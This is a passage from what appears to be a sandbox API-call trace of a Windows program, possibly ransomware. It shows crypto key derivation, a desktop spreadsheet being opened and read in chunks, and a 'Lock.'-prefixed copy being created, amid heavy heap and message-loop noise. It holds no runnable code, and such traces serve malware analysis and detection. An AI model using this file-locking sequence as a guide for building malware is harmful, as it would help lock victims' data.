wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.320] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0090.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0090.320] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a4200, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a3d00) returned 1 [0090.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.320] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.320] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.320] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.320] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.320] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ea0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0090.320] CryptDestroyHash (hHash=0x9a4200) returned 1 [0090.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.320] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.321] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.321] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.321] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.321] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/eacUdxJuUDfuA061.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\eacudxjuudfua061.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0090.321] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.321] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0090.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0090.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0090.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0090.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0090.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75df8 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.323] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75df8 | out: hHeap=0x2af0000) returned 1 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0090.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0090.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0090.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0090.323] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.eacUdxJuUDfuA061.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.eacudxjuudfua061.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0090.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0090.324] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0090.324] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0090.324] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0090.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0090.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x39cb020 [0090.327] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0090.327] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0090.329] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x3ea7, lpOverlapped=0x0) returned 1 [0090.330] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0090.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13ea7) returned 0x2a7a130 [0090.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x39cb020 | out: hHeap=0x2af0000) returned 1 [0090.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13ea7) returned 0x2a8dfe0 [0090.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0090.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0090.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13ea7) returned 0x2a7a130 [0090.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0090.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0090.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0090.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0090.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0090.340] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0090.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0090.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72748 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0090.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13ea7) returned 0x2a7a130 [0090.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0090.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0090.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0090.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13ea7) returned 0x37c0048 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 